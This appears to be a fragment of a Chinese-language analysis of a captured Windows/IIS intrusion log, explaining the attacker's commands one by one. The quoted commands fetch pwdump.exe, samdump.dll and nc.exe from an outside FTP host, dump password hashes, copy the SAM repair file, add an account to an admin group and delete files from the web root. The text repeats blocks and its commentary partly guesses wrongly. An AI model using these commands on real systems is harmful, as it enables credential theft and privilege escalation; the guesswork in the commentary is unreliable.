net session >> yay2.txt net session >> c:\yay2.txt
net users >> heh.txt net users >> c:\heh.txt
net localgroup Domain Admin IWAM_KENNY /ADD mkdir–/s mkdir mkdir –s/ mkdir /s – type c:\winnt\repair\sa._ >> c:\har.txt del c:\inetpub\wwwroot\har.txt del c:\inetpub\wwwroot\har.txt type c:\winnt\repair\sa._ >> c:\har.txt del c:\inetpub\wwwroot\har.txt del c:\inetpub\wwwroot\har.txt
代码略长,我们一点点分析 :
1 2 3
echo werd >> c:\fun echo user johna2k > ftpcom echo hacker 2000 >> ftpcom
应该是记录了攻击者的名字以及攻击的端口,从变量名字上看,是一个ftp的网站?
1 2 3 4 5 6
echo get samdump.dll >> ftpcom echo get pwdump.exe >> ftpcom echo get nc.exe>>ftpcom echo quit>>ftpcom ftp –s:ftpcom -nwww.unknown.net pwdump.exe>>new.pass
net session >> yay2.txt net session >> c:\yay2.txt
net users >> heh.txt net users >> c:\heh.txt
net localgroup Domain Admin IWAM_KENNY /ADD
这段比较有意思,键入不带参数的 net session 可以显示所有与本地计算机的会话的信息。而net users则是显示出当前的所有用户。最后一句话正好符合:
net localgroup groupname name […] {/ADD | /DELETE} [/DOMAIN]
虽然不知道IWAM_KENNY是啥,但是大概的意思就是将Admin加入Domain用户组。
1 2 3 4 5 6 7 8 9 10 11
mkdir–/s mkdir mkdir –s/ mkdir /s – type c:\winnt\repair\sa._ >> c:\har.txt del c:\inetpub\wwwroot\har.txt del c:\inetpub\wwwroot\har.txt type c:\winnt\repair\sa._ >> c:\har.txt del c:\inetpub\wwwroot\har.txt del c:\inetpub\wwwroot\har.txt